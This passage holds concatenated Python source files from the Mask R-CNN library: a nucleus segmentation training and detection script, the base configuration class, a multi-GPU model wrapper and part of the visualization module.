matplotlib.use('Agg') import matplotlib.pyplot as plt import os import sys import json import datetime import numpy as np import skimage.io from imgaug import augmenters as iaa # Root directory of the project ROOT_DIR = os.path.abspath("../../") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of the library from mrcnn.config import Config from mrcnn import utils from mrcnn import model as modellib from mrcnn import visualize # Path to trained weights file COCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5") # Directory to save logs and model checkpoints, if not provided # through the command line argument --logs DEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, "logs") # Results directory # Save submission files here RESULTS_DIR = os.path.join(ROOT_DIR, "results/nucleus/") # The dataset doesn't have a standard train/val split, so I picked # a variety of images to surve as a validation set. VAL_IMAGE_IDS = [ "0c2550a23b8a0f29a7575de8c61690d3c31bc897dd5ba66caec201d201a278c2", "92f31f591929a30e4309ab75185c96ff4314ce0a7ead2ed2c2171897ad1da0c7", "1e488c42eb1a54a3e8412b1f12cde530f950f238d71078f2ede6a85a02168e1f", "c901794d1a421d52e5734500c0a2a8ca84651fb93b19cec2f411855e70cae339", "8e507d58f4c27cd2a82bee79fe27b069befd62a46fdaed20970a95a2ba819c7b", "60cb718759bff13f81c4055a7679e81326f78b6a193a2d856546097c949b20ff", "da5f98f2b8a64eee735a398de48ed42cd31bf17a6063db46a9e0783ac13cd844", "9ebcfaf2322932d464f15b5662cae4d669b2d785b8299556d73fffcae8365d32", "1b44d22643830cd4f23c9deadb0bd499fb392fb2cd9526d81547d93077d983df", "97126a9791f0c1176e4563ad679a301dac27c59011f579e808bbd6e9f4cd1034", "e81c758e1ca177b0942ecad62cf8d321ffc315376135bcbed3df932a6e5b40c0", "f29fd9c52e04403cd2c7d43b6fe2479292e53b2f61969d25256d2d2aca7c6a81", "0ea221716cf13710214dcd331a61cea48308c3940df1d28cfc7fd817c83714e1", "3ab9cab6212fabd723a2c5a1949c2ded19980398b56e6080978e796f45cbbc90", "ebc18868864ad075548cc1784f4f9a237bb98335f9645ee727dac8332a3e3716", "bb61fc17daf8bdd4e16fdcf50137a8d7762bec486ede9249d92e511fcb693676", "e1bcb583985325d0ef5f3ef52957d0371c96d4af767b13e48102bca9d5351a9b", "947c0d94c8213ac7aaa41c4efc95d854246550298259cf1bb489654d0e969050", "cbca32daaae36a872a11da4eaff65d1068ff3f154eedc9d3fc0c214a4e5d32bd", "f4c4db3df4ff0de90f44b027fc2e28c16bf7e5c75ea75b0a9762bbb7ac86e7a3", "4193474b2f1c72f735b13633b219d9cabdd43c21d9c2bb4dfc4809f104ba4c06", "f73e37957c74f554be132986f38b6f1d75339f636dfe2b681a0cf3f88d2733af", "a4c44fc5f5bf213e2be6091ccaed49d8bf039d78f6fbd9c4d7b7428cfcb2eda4", "cab4875269f44a701c5e58190a1d2f6fcb577ea79d842522dcab20ccb39b7ad2", "8ecdb93582b2d5270457b36651b62776256ade3aaa2d7432ae65c14f07432d49", ] ############################################################ # Configurations ############################################################ class NucleusConfig(Config): """Configuration for training on the nucleus segmentation dataset.""" # Give the configuration a recognizable name NAME = "nucleus" # Adjust depending on your GPU memory IMAGES_PER_GPU = 6 # Number of classes (including background) NUM_CLASSES = 1 + 1 # Background + nucleus # Number of training and validation steps per epoch STEPS_PER_EPOCH = (657 - len(VAL_IMAGE_IDS)) // IMAGES_PER_GPU VALIDATION_STEPS = max(1, len(VAL_IMAGE_IDS) // IMAGES_PER_GPU) # Don't exclude based on confidence. Since we have two classes # then 0.5 is the minimum anyway as it picks between nucleus and BG DETECTION_MIN_CONFIDENCE = 0 # Backbone network architecture # Supported values are: resnet50, resnet101 BACKBONE = "resnet50" # Input image resizing # Random crops of size 512x512 IMAGE_RESIZE_MODE = "crop" IMAGE_MIN_DIM = 512 IMAGE_MAX_DIM = 512 IMAGE_MIN_SCALE = 2.0 # Length of square anchor side in pixels RPN_ANCHOR_SCALES = (8, 16, 32, 64, 128) # ROIs kept after non-maximum supression (training and inference) POST_NMS_ROIS_TRAINING = 1000 POST_NMS_ROIS_INFERENCE = 2000 # Non-max suppression threshold to filter RPN proposals. # You can increase this during training to generate more propsals. RPN_NMS_THRESHOLD = 0.9 # How many anchors per image to use for RPN training RPN_TRAIN_ANCHORS_PER_IMAGE = 64 # Image mean (RGB) MEAN_PIXEL = np.array([43.53, 39.56, 48.22]) # If enabled, resizes instance masks to a smaller size to reduce # memory load. Recommended when using high-resolution images. USE_MINI_MASK = True MINI_MASK_SHAPE = (56, 56) # (height, width) of the mini-mask # Number of ROIs per image to feed to classifier/mask heads # The Mask RCNN paper uses 512 but often the RPN doesn't generate # enough positive proposals to fill this and keep a positive:negative # ratio of 1:3. You can increase the number of proposals by adjusting # the RPN NMS threshold. TRAIN_ROIS_PER_IMAGE = 128 # Maximum number of ground truth instances to use in one image MAX_GT_INSTANCES = 200 # Max number of final detections per image DETECTION_MAX_INSTANCES = 400 class NucleusInferenceConfig(NucleusConfig): # Set batch size to 1 to run one image at a time GPU_COUNT = 1 IMAGES_PER_GPU = 1 # Don't resize imager for inferencing IMAGE_RESIZE_MODE = "pad64" # Non-max suppression threshold to filter RPN proposals. # You can increase this during training to generate more propsals. RPN_NMS_THRESHOLD = 0.7 ############################################################ # Dataset ############################################################ class NucleusDataset(utils.Dataset): def load_nucleus(self, dataset_dir, subset): """Load a subset of the nuclei dataset. dataset_dir: Root directory of the dataset subset: Subset to load. Either the name of the sub-directory, such as stage1_train, stage1_test, ...etc. or, one of: * train: stage1_train excluding validation images * val: validation images from VAL_IMAGE_IDS """ # Add classes. We have one class. # Naming the dataset nucleus, and the class nucleus self.add_class("nucleus", 1, "nucleus") # Which subset? # "val": use hard-coded list above # "train": use data from stage1_train minus the hard-coded list above # else: use the data from the specified sub-directory assert subset in ["train", "val", "stage1_train", "stage1_test", "stage2_test"] subset_dir = "stage1_train" if subset in ["train", "val"] else subset dataset_dir = os.path.join(dataset_dir, subset_dir) if subset == "val": image_ids = VAL_IMAGE_IDS else: # Get image ids from directory names image_ids = next(os.walk(dataset_dir))[1] if subset == "train": image_ids = list(set(image_ids) - set(VAL_IMAGE_IDS)) # Add images for image_id in image_ids: self.add_image( "nucleus", image_id=image_id, path=os.path.join(dataset_dir, image_id, "images/{}.png".format(image_id))) def load_mask(self, image_id): """Generate instance masks for an image. Returns: masks: A bool array of shape [height, width, instance count] with one mask per instance. class_ids: a 1D array of class IDs of the instance masks. """ info = self.image_info[image_id] # Get mask directory from image path mask_dir = os.path.join(os.path.dirname(os.path.dirname(info['path'])), "masks") # Read mask files from .png image mask = [] for f in next(os.walk(mask_dir))[2]: if f.endswith(".png"): m = skimage.io.imread(os.path.join(mask_dir, f)).astype(np.bool) mask.append(m) mask = np.stack(mask, axis=-1) # Return mask, and array of class IDs of each instance. Since we have # one class ID, we return an array of ones return mask, np.ones([mask.shape[-1]], dtype=np.int32) def image_reference(self, image_id): """Return the path of the image.""" info = self.image_info[image_id] if info["source"] == "nucleus": return info["id"] else: super(self.__class__, self).image_reference(image_id) ############################################################ # Training ############################################################ def train(model, dataset_dir, subset): """Train the model.""" # Training dataset. dataset_train = NucleusDataset() dataset_train.load_nucleus(dataset_dir, subset) dataset_train.prepare() # Validation dataset dataset_val = NucleusDataset() dataset_val.load_nucleus(dataset_dir, "val") dataset_val.prepare() # Image augmentation # http://imgaug.readthedocs.io/en/latest/source/augmenters.html augmentation = iaa.SomeOf((0, 2), [ iaa.Fliplr(0.5), iaa.Flipud(0.5), iaa.OneOf([iaa.Affine(rotate=90), iaa.Affine(rotate=180), iaa.Affine(rotate=270)]), iaa.Multiply((0.8, 1.5)), iaa.GaussianBlur(sigma=(0.0, 5.0)) ]) # *** This training schedule is an example. Update to your needs *** # If starting from imagenet, train heads only for a bit # since they have random weights print("Train network heads") model.train(dataset_train, dataset_val, learning_rate=config.LEARNING_RATE, epochs=20, augmentation=augmentation, layers='heads') print("Train all layers") model.train(dataset_train, dataset_val, learning_rate=config.LEARNING_RATE, epochs=40, augmentation=augmentation, layers='all') ############################################################ # RLE Encoding ############################################################ def rle_encode(mask): """Encodes a mask in Run Length Encoding (RLE). Returns a string of space-separated values. """ assert mask.ndim == 2, "Mask must be of shape [Height, Width]" # Flatten it column wise m = mask.T.flatten() # Compute gradient. Equals 1 or -1 at transition points g = np.diff(np.concatenate([[0], m, [0]]), n=1) # 1-based indicies of transition points (where gradient != 0) rle = np.where(g != 0)[0].reshape([-1, 2]) + 1 # Convert second index in each pair to lenth rle[:, 1] = rle[:, 1] - rle[:, 0] return " ".join(map(str, rle.flatten())) def rle_decode(rle, shape): """Decodes an RLE encoded list of space separated numbers and returns a binary mask.""" rle = list(map(int, rle.split())) rle = np.array(rle, dtype=np.int32).reshape([-1, 2]) rle[:, 1] += rle[:, 0] rle -= 1 mask = np.zeros([shape[0] * shape[1]], np.bool) for s, e in rle: assert 0 <= s < mask.shape[0] assert 1 <= e <= mask.shape[0], "shape: {} s {} e {}".format(shape, s, e) mask[s:e] = 1 # Reshape and transpose mask = mask.reshape([shape[1], shape[0]]).T return mask def mask_to_rle(image_id, mask, scores): "Encodes instance masks to submission format." assert mask.ndim == 3, "Mask must be [H, W, count]" # If mask is empty, return line with image ID only if mask.shape[-1] == 0: return "{},".format(image_id) # Remove mask overlaps # Multiply each instance mask by its score order # then take the maximum across the last dimension order = np.argsort(scores)[::-1] + 1 # 1-based descending mask = np.max(mask * np.reshape(order, [1, 1, -1]), -1) # Loop over instance masks lines = [] for o in order: m = np.where(mask == o, 1, 0) # Skip if empty if m.sum() == 0.0: continue rle = rle_encode(m) lines.append("{}, {}".format(image_id, rle)) return "\n".join(lines) ############################################################ # Detection ############################################################ def detect(model, dataset_dir, subset): """Run detection on images in the given directory.""" print("Running on {}".format(dataset_dir)) # Create directory if not os.path.exists(RESULTS_DIR): os.makedirs(RESULTS_DIR) submit_dir = "submit_{:%Y%m%dT%H%M%S}".format(datetime.datetime.now()) submit_dir = os.path.join(RESULTS_DIR, submit_dir) os.makedirs(submit_dir) # Read dataset dataset = NucleusDataset() dataset.load_nucleus(dataset_dir, subset) dataset.prepare() # Load over images submission = [] for image_id in dataset.image_ids: # Load image and run detection image = dataset.load_image(image_id) # Detect objects r = model.detect([image], verbose=0)[0] # Encode image to RLE. Returns a string of multiple lines source_id = dataset.image_info[image_id]["id"] rle = mask_to_rle(source_id, r["masks"], r["scores"]) submission.append(rle) # Save image with masks visualize.display_instances( image, r['rois'], r['masks'], r['class_ids'], dataset.class_names, r['scores'], show_bbox=False, show_mask=False, title="Predictions") plt.savefig("{}/{}.png".format(submit_dir, dataset.image_info[image_id]["id"])) # Save to csv file submission = "ImageId,EncodedPixels\n" + "\n".join(submission) file_path = os.path.join(submit_dir, "submit.csv") with open(file_path, "w") as f: f.write(submission) print("Saved to ", submit_dir) ############################################################ # Command Line ############################################################ if __name__ == '__main__': import argparse # Parse command line arguments parser = argparse.ArgumentParser( description='Mask R-CNN for nuclei counting and segmentation') parser.add_argument("command", metavar="<command>", help="'train' or 'detect'") parser.add_argument('--dataset', required=False, metavar="/path/to/dataset/", help='Root directory of the dataset') parser.add_argument('--weights', required=True, metavar="/path/to/weights.h5", help="Path to weights .h5 file or 'coco'") parser.add_argument('--logs', required=False, default=DEFAULT_LOGS_DIR, metavar="/path/to/logs/", help='Logs and checkpoints directory (default=logs/)') parser.add_argument('--subset', required=False, metavar="Dataset sub-directory", help="Subset of dataset to run prediction on") args = parser.parse_args() # Validate arguments if args.command == "train": assert args.dataset, "Argument --dataset is required for training" elif args.command == "detect": assert args.subset, "Provide --subset to run prediction on" print("Weights: ", args.weights) print("Dataset: ", args.dataset) if args.subset: print("Subset: ", args.subset) print("Logs: ", args.logs) # Configurations if args.command == "train": config = NucleusConfig() else: config = NucleusInferenceConfig() config.display() # Create model if args.command == "train": model = modellib.MaskRCNN(mode="training", config=config, model_dir=args.logs) else: model = modellib.MaskRCNN(mode="inference", config=config, model_dir=args.logs) # Select weights file to load if args.weights.lower() == "coco": weights_path = COCO_WEIGHTS_PATH # Download weights file if not os.path.exists(weights_path): utils.download_trained_weights(weights_path) elif args.weights.lower() == "last": # Find last trained weights weights_path = model.find_last() elif args.weights.lower() == "imagenet": # Start from ImageNet trained weights weights_path = model.get_imagenet_weights() else: weights_path = args.weights # Load weights print("Loading weights ", weights_path) if args.weights.lower() == "coco": # Exclude the last layers because they require a matching # number of classes model.load_weights(weights_path, by_name=True, exclude=[ "mrcnn_class_logits", "mrcnn_bbox_fc", "mrcnn_bbox", "mrcnn_mask"]) else: model.load_weights(weights_path, by_name=True) # Train or evaluate if args.command == "train": train(model, args.dataset, args.subset) elif args.command == "detect": detect(model, args.dataset, args.subset) else: print("'{}' is not recognized. " "Use 'train' or 'detect'".format(args.command)) File: mrcnn/config.py """ Mask R-CNN Base Configurations class. Copyright (c) 2017 Matterport, Inc. Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla """ import numpy as np # Base Configuration Class # Don't use this class directly. Instead, sub-class it and override # the configurations you need to change. class Config(object): """Base configuration class. For custom configurations, create a sub-class that inherits from this one and override properties that need to be changed. """ # Name the configurations. For example, 'COCO', 'Experiment 3', ...etc. # Useful if your code needs to do things differently depending on which # experiment is running. NAME = None # Override in sub-classes # NUMBER OF GPUs to use. When using only a CPU, this needs to be set to 1. GPU_COUNT = 1 # Number of images to train with on each GPU. A 12GB GPU can typically # handle 2 images of 1024x1024px. # Adjust based on your GPU memory and image sizes. Use the highest # number that your GPU can handle for best performance. IMAGES_PER_GPU = 2 # Number of training steps per epoch # This doesn't need to match the size of the training set. Tensorboard # updates are saved at the end of each epoch, so setting this to a # smaller number means getting more frequent TensorBoard updates. # Validation stats are also calculated at each epoch end and they # might take a while, so don't set this too small to avoid spending # a lot of time on validation stats. STEPS_PER_EPOCH = 1000 # Number of validation steps to run at the end of every training epoch. # A bigger number improves accuracy of validation stats, but slows # down the training. VALIDATION_STEPS = 50 # Backbone network architecture # Supported values are: resnet50, resnet101. # You can also provide a callable that should have the signature # of model.resnet_graph. If you do so, you need to supply a callable # to COMPUTE_BACKBONE_SHAPE as well BACKBONE = "resnet101" # Only useful if you supply a callable to BACKBONE. Should compute # the shape of each layer of the FPN Pyramid. # See model.compute_backbone_shapes COMPUTE_BACKBONE_SHAPE = None # The strides of each layer of the FPN Pyramid. These values # are based on a Resnet101 backbone. BACKBONE_STRIDES = [4, 8, 16, 32, 64] # Size of the fully-connected layers in the classification graph FPN_CLASSIF_FC_LAYERS_SIZE = 1024 # Size of the top-down layers used to build the feature pyramid TOP_DOWN_PYRAMID_SIZE = 256 # Number of classification classes (including background) NUM_CLASSES = 1 # Override in sub-classes # Length of square anchor side in pixels RPN_ANCHOR_SCALES = (32, 64, 128, 256, 512) # Ratios of anchors at each cell (width/height) # A value of 1 represents a square anchor, and 0.5 is a wide anchor RPN_ANCHOR_RATIOS = [0.5, 1, 2] # Anchor stride # If 1 then anchors are created for each cell in the backbone feature map. # If 2, then anchors are created for every other cell, and so on. RPN_ANCHOR_STRIDE = 1 # Non-max suppression threshold to filter RPN proposals. # You can increase this during training to generate more propsals. RPN_NMS_THRESHOLD = 0.7 # How many anchors per image to use for RPN training RPN_TRAIN_ANCHORS_PER_IMAGE = 256 # ROIs kept after tf.nn.top_k and before non-maximum suppression PRE_NMS_LIMIT = 6000 # ROIs kept after non-maximum suppression (training and inference) POST_NMS_ROIS_TRAINING = 2000 POST_NMS_ROIS_INFERENCE = 1000 # If enabled, resizes instance masks to a smaller size to reduce # memory load. Recommended when using high-resolution images. USE_MINI_MASK = True MINI_MASK_SHAPE = (56, 56) # (height, width) of the mini-mask # Input image resizing # Generally, use the "square" resizing mode for training and predicting # and it should work well in most cases. In this mode, images are scaled # up such that the small side is = IMAGE_MIN_DIM, but ensuring that the # scaling doesn't make the long side > IMAGE_MAX_DIM. Then the image is # padded with zeros to make it a square so multiple images can be put # in one batch. # Available resizing modes: # none: No resizing or padding. Return the image unchanged. # square: Resize and pad with zeros to get a square image # of size [max_dim, max_dim]. # pad64: Pads width and height with zeros to make them multiples of 64. # If IMAGE_MIN_DIM or IMAGE_MIN_SCALE are not None, then it scales # up before padding. IMAGE_MAX_DIM is ignored in this mode. # The multiple of 64 is needed to ensure smooth scaling of feature # maps up and down the 6 levels of the FPN pyramid (2**6=64). # crop: Picks random crops from the image. First, scales the image based # on IMAGE_MIN_DIM and IMAGE_MIN_SCALE, then picks a random crop of # size IMAGE_MIN_DIM x IMAGE_MIN_DIM. Can be used in training only. # IMAGE_MAX_DIM is not used in this mode. IMAGE_RESIZE_MODE = "square" IMAGE_MIN_DIM = 800 IMAGE_MAX_DIM = 1024 # Minimum scaling ratio. Checked after MIN_IMAGE_DIM and can force further # up scaling. For example, if set to 2 then images are scaled up to double # the width and height, or more, even if MIN_IMAGE_DIM doesn't require it. # However, in 'square' mode, it can be overruled by IMAGE_MAX_DIM. IMAGE_MIN_SCALE = 0 # Number of color channels per image. RGB = 3, grayscale = 1, RGB-D = 4 # Changing this requires other changes in the code. See the WIKI for more # details: https://github.com/matterport/Mask_RCNN/wiki IMAGE_CHANNEL_COUNT = 3 # Image mean (RGB) MEAN_PIXEL = np.array([123.7, 116.8, 103.9]) # Number of ROIs per image to feed to classifier/mask heads # The Mask RCNN paper uses 512 but often the RPN doesn't generate # enough positive proposals to fill this and keep a positive:negative # ratio of 1:3. You can increase the number of proposals by adjusting # the RPN NMS threshold. TRAIN_ROIS_PER_IMAGE = 200 # Percent of positive ROIs used to train classifier/mask heads ROI_POSITIVE_RATIO = 0.33 # Pooled ROIs POOL_SIZE = 7 MASK_POOL_SIZE = 14 # Shape of output mask # To change this you also need to change the neural network mask branch MASK_SHAPE = [28, 28] # Maximum number of ground truth instances to use in one image MAX_GT_INSTANCES = 100 # Bounding box refinement standard deviation for RPN and final detections. RPN_BBOX_STD_DEV = np.array([0.1, 0.1, 0.2, 0.2]) BBOX_STD_DEV = np.array([0.1, 0.1, 0.2, 0.2]) # Max number of final detections DETECTION_MAX_INSTANCES = 100 # Minimum probability value to accept a detected instance # ROIs below this threshold are skipped DETECTION_MIN_CONFIDENCE = 0.7 # Non-maximum suppression threshold for detection DETECTION_NMS_THRESHOLD = 0.3 # Learning rate and momentum # The Mask RCNN paper uses lr=0.02, but on TensorFlow it causes # weights to explode. Likely due to differences in optimizer # implementation. LEARNING_RATE = 0.001 LEARNING_MOMENTUM = 0.9 # Weight decay regularization WEIGHT_DECAY = 0.0001 # Loss weights for more precise optimization. # Can be used for R-CNN training setup. LOSS_WEIGHTS = { "rpn_class_loss": 1., "rpn_bbox_loss": 1., "mrcnn_class_loss": 1., "mrcnn_bbox_loss": 1., "mrcnn_mask_loss": 1. } # Use RPN ROIs or externally generated ROIs for training # Keep this True for most situations. Set to False if you want to train # the head branches on ROI generated by code rather than the ROIs from # the RPN. For example, to debug the classifier head without having to # train the RPN. USE_RPN_ROIS = True # Train or freeze batch normalization layers # None: Train BN layers. This is the normal mode # False: Freeze BN layers. Good when using a small batch size # True: (don't use). Set layer in training mode even when predicting TRAIN_BN = False # Defaulting to False since batch size is often small # Gradient norm clipping GRADIENT_CLIP_NORM = 5.0 def __init__(self): """Set values of computed attributes.""" # Effective batch size self.BATCH_SIZE = self.IMAGES_PER_GPU * self.GPU_COUNT # Input image size if self.IMAGE_RESIZE_MODE == "crop": self.IMAGE_SHAPE = np.array([self.IMAGE_MIN_DIM, self.IMAGE_MIN_DIM, self.IMAGE_CHANNEL_COUNT]) else: self.IMAGE_SHAPE = np.array([self.IMAGE_MAX_DIM, self.IMAGE_MAX_DIM, self.IMAGE_CHANNEL_COUNT]) # Image meta data length # See compose_image_meta() for details self.IMAGE_META_SIZE = 1 + 3 + 3 + 4 + 1 + self.NUM_CLASSES def display(self): """Display Configuration values.""" print("\nConfigurations:") for a in dir(self): if not a.startswith("__") and not callable(getattr(self, a)): print("{:30} {}".format(a, getattr(self, a))) print("\n") File: mrcnn/parallel_model.py """ Mask R-CNN Multi-GPU Support for Keras. Copyright (c) 2017 Matterport, Inc. Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla Ideas and a small code snippets from these sources: https://github.com/fchollet/keras/issues/2436 https://medium.com/@kuza55/transparent-multi-gpu-training-on-tensorflow-with-keras-8b0016fd9012 https://github.com/avolkov1/keras_experiments/blob/master/keras_exp/multigpu/ https://github.com/fchollet/keras/blob/master/keras/utils/training_utils.py """ import tensorflow as tf import keras.backend as K import keras.layers as KL import keras.models as KM class ParallelModel(KM.Model): """Subclasses the standard Keras Model and adds multi-GPU support. It works by creating a copy of the model on each GPU. Then it slices the inputs and sends a slice to each copy of the model, and then merges the outputs together and applies the loss on the combined outputs. """ def __init__(self, keras_model, gpu_count): """Class constructor. keras_model: The Keras model to parallelize gpu_count: Number of GPUs. Must be > 1 """ self.inner_model = keras_model self.gpu_count = gpu_count merged_outputs = self.make_parallel() super(ParallelModel, self).__init__(inputs=self.inner_model.inputs, outputs=merged_outputs) def __getattribute__(self, attrname): """Redirect loading and saving methods to the inner model. That's where the weights are stored.""" if 'load' in attrname or 'save' in attrname: return getattr(self.inner_model, attrname) return super(ParallelModel, self).__getattribute__(attrname) def summary(self, *args, **kwargs): """Override summary() to display summaries of both, the wrapper and inner models.""" super(ParallelModel, self).summary(*args, **kwargs) self.inner_model.summary(*args, **kwargs) def make_parallel(self): """Creates a new wrapper model that consists of multiple replicas of the original model placed on different GPUs. """ # Slice inputs. Slice inputs on the CPU to avoid sending a copy # of the full inputs to all GPUs. Saves on bandwidth and memory. input_slices = {name: tf.split(x, self.gpu_count) for name, x in zip(self.inner_model.input_names, self.inner_model.inputs)} output_names = self.inner_model.output_names outputs_all = [] for i in range(len(self.inner_model.outputs)): outputs_all.append([]) # Run the model call() on each GPU to place the ops there for i in range(self.gpu_count): with tf.device('/gpu:%d' % i): with tf.name_scope('tower_%d' % i): # Run a slice of inputs through this replica zipped_inputs = zip(self.inner_model.input_names, self.inner_model.inputs) inputs = [ KL.Lambda(lambda s: input_slices[name][i], output_shape=lambda s: (None,) + s[1:])(tensor) for name, tensor in zipped_inputs] # Create the model replica and get the outputs outputs = self.inner_model(inputs) if not isinstance(outputs, list): outputs = [outputs] # Save the outputs for merging back together later for l, o in enumerate(outputs): outputs_all[l].append(o) # Merge outputs on CPU with tf.device('/cpu:0'): merged = [] for outputs, name in zip(outputs_all, output_names): # Concatenate or average outputs? # Outputs usually have a batch dimension and we concatenate # across it. If they don't, then the output is likely a loss # or a metric value that gets averaged across the batch. # Keras expects losses and metrics to be scalars. if K.int_shape(outputs[0]) == (): # Average m = KL.Lambda(lambda o: tf.add_n(o) / len(outputs), name=name)(outputs) else: # Concatenate m = KL.Concatenate(axis=0, name=name)(outputs) merged.append(m) return merged if __name__ == "__main__": # Testing code below. It creates a simple model to train on MNIST and # tries to run it on 2 GPUs. It saves the graph so it can be viewed # in TensorBoard. Run it as: # # python3 parallel_model.py import os import numpy as np import keras.optimizers from keras.datasets import mnist from keras.preprocessing.image import ImageDataGenerator GPU_COUNT = 2 # Root directory of the project ROOT_DIR = os.path.abspath("../") # Directory to save logs and trained model MODEL_DIR = os.path.join(ROOT_DIR, "logs") def build_model(x_train, num_classes): # Reset default graph. Keras leaves old ops in the graph, # which are ignored for execution but clutter graph # visualization in TensorBoard. tf.reset_default_graph() inputs = KL.Input(shape=x_train.shape[1:], name="input_image") x = KL.Conv2D(32, (3, 3), activation='relu', padding="same", name="conv1")(inputs) x = KL.Conv2D(64, (3, 3), activation='relu', padding="same", name="conv2")(x) x = KL.MaxPooling2D(pool_size=(2, 2), name="pool1")(x) x = KL.Flatten(name="flat1")(x) x = KL.Dense(128, activation='relu', name="dense1")(x) x = KL.Dense(num_classes, activation='softmax', name="dense2")(x) return KM.Model(inputs, x, "digit_classifier_model") # Load MNIST Data (x_train, y_train), (x_test, y_test) = mnist.load_data() x_train = np.expand_dims(x_train, -1).astype('float32') / 255 x_test = np.expand_dims(x_test, -1).astype('float32') / 255 print('x_train shape:', x_train.shape) print('x_test shape:', x_test.shape) # Build data generator and model datagen = ImageDataGenerator() model = build_model(x_train, 10) # Add multi-GPU support. model = ParallelModel(model, GPU_COUNT) optimizer = keras.optimizers.SGD(lr=0.01, momentum=0.9, clipnorm=5.0) model.compile(loss='sparse_categorical_crossentropy', optimizer=optimizer, metrics=['accuracy']) model.summary() # Train model.fit_generator( datagen.flow(x_train, y_train, batch_size=64), steps_per_epoch=50, epochs=10, verbose=1, validation_data=(x_test, y_test), callbacks=[keras.callbacks.TensorBoard(log_dir=MODEL_DIR, write_graph=True)] ) File: mrcnn/__init__.py File: mrcnn/visualize.py """ Mask R-CNN Display and Visualization Functions. Copyright (c) 2017 Matterport, Inc. Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla """ import os import sys import random import itertools import colorsys import numpy as np from skimage.measure import find_contours import matplotlib.pyplot as plt from matplotlib import patches, lines from matplotlib.patches import Polygon import IPython.display # Root directory of the project ROOT_DIR = os.path.abspath("../") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of the library from mrcnn import utils ############################################################ # Visualization ############################################################ def display_images(images, titles=None, cols=4, cmap=None, norm=None, interpolation=None): """Display the given set of images, optionally with titles. images: list or array of image tensors in HWC format. titles: optional. A list of titles to display with each image. cols: number of images per row cmap: Optional. Color map to use. For example, "Blues". norm: Optional. A Normalize instance to map values to colors. interpolation: Optional. Image interpolation to use for display. """ titles = titles if titles is not None else [""] * len(images) rows = len(images) // cols + 1 plt.figure(figsize=(14, 14 * rows // cols)) i = 1 for image, title in zip(images, titles): plt.subplot(rows, cols, i) plt.title(title, fontsize=9) plt.axis('off') plt.imshow(image.astype(np.uint8), cmap=cmap, norm=norm, interpolation=interpolation) i += 1 plt.show() def random_colors(N, bright=True): """ Generate random colors. To get visually distinct colors, generate them in HSV space then convert to RGB. """ brightness = 1.0 if bright else 0.7 hsv = [(i / N, 1, brightness) for i in range(N)] colors = list(map(lambda c: colorsys.hsv_to_rgb(*c), hsv)) random.shuffle(colors) return colors def apply_mask(image, mask, color, alpha=0.5): """Apply the given mask to the image. """ for c in range(3): image[:, :, c] = np.where(mask == 1, image[:, :, c] * (1 - alpha) + alpha * color[c] * 255, image[:, :, c]) return image def display_instances(image, boxes, masks, class_ids, class_names, scores=None, title="", figsize=(16, 16), ax=None, show_mask=True, show_bbox=True, colors=None, captions=None): """ boxes: [num_instance, (y1, x1, y2, x2, class_id)] in image coordinates. masks: [height, width, num_instances] class_ids: [num_instances] class_names: list of class names of the dataset scores: (optional) confidence scores for each box title: (optional) Figure title show_mask, show_bbox: To show masks and bounding boxes or not figsize: (optional) the size of the image colors: (optional) An array or colors to use with each object captions: (optional) A list of strings to use as captions for each object """ # Number of instances N = boxes.shape[0] if not N: print("\n*** No instances to display *** \n") else: assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0] # If no axis is passed, create one and automatically call show() auto_show = False if not ax: _, ax = plt.subplots(1, figsize=figsize) auto_show = True # Generate random colors colors = colors or random_colors(N) # Show area outside image boundaries. height, width = image.shape[:2] ax.set_ylim(height + 10, -10) ax.set_xlim(-10, width + 10) ax.axis('off') ax.set_title(title) masked_image = image.astype(np.uint32).copy() for i in range(N): color = colors[i] # Bounding box if not np.any(boxes[i]): # Skip this instance. Has no bbox. Likely lost in image cropping. continue y1, x1, y2, x2 = boxes[i] if show_bbox: p = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2, alpha=0.7, linestyle="dashed", edgecolor=color, facecolor='none') ax.add_patch(p) # Label if not captions: class_id = class_ids[i] score = scores[i] if scores is not None else None label = class_names[class_id] caption = "{} {:.3f}".format(label, score) if score else label else: caption = captions[i] ax.text(x1, y1 + 8, caption, color='w', size=11, backgroundcolor="none") # Mask mask = masks[:, :, i] if show_mask: masked_image = apply_mask(masked_image, mask, color) # Mask Polygon # Pad to ensure proper polygons for masks that touch image edges. padded_mask = np.zeros( (mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8) padded_mask[1:-1, 1:-1] = mask contours = find_contours(padded_mask, 0.5) for verts in contours: # Subtract the padding and flip (y, x) to (x, y) verts = np.fliplr(verts) - 1 p = Polygon(verts, facecolor="none", edgecolor=color) ax.add_patch(p) ax.imshow(masked_image.astype(np.uint8)) if auto_show: plt.show() def display_differences(image, gt_box, gt_class_id, gt_mask, pred_box, pred_class_id, pred_score, pred_mask, class_names, title="", ax=None, show_mask=True, show_box=True, iou_threshold=0.5, score_threshold=0.5): """Display ground truth and prediction instances on the same image.""" # Match predictions to ground truth gt_match, pred_match, overlaps = utils.compute_matches( gt_box, gt_class_id, gt_mask, pred_box, pred_class_id, pred_score, pred_mask, iou_threshold=iou_threshold, score_threshold=score_threshold) # Ground truth = green. Predictions = red colors = [(0, 1, 0, .8)] * len(gt_match)\ + [(1, 0, 0, 1)] * len(pred_match) # Concatenate GT and predictions class_ids = np.concatenate([gt_class_id, pred_class_id]) scores = np.concatenate([np.zeros([len(gt_match)]), pred_score]) boxes = np.concatenate([gt_box, pred_box]) masks = np.concatenate([gt_mask, pred_mask], axis=-1) # Captions per instance show score/IoU captions = ["" for m in gt_match] + ["{:.2f} / {:.2f}".format( pred_score[i], (overlaps[i, int(pred_match[i])] if pred_match[i] > -1 else overlaps[i].max())) for i in range(len(pred_match))] # Set title if not provided title = title or "Ground Truth and Detections\n GT=green, pred=red, captions: score/IoU" # Display display_instances( image, boxes, masks, class_ids, class_names, scores, ax=ax, show_bbox=show_box, show_mask=show_mask, colors=colors, captions=captions, title=title) def draw_rois(image, rois, refined_rois, mask, class_ids, class_names, limit=10): """ anchors: [n, (y1, x1, y2, x2)] list of anchors in image coordinates. proposals: [n, 4] the same anchors but refined to fit objects better. """ 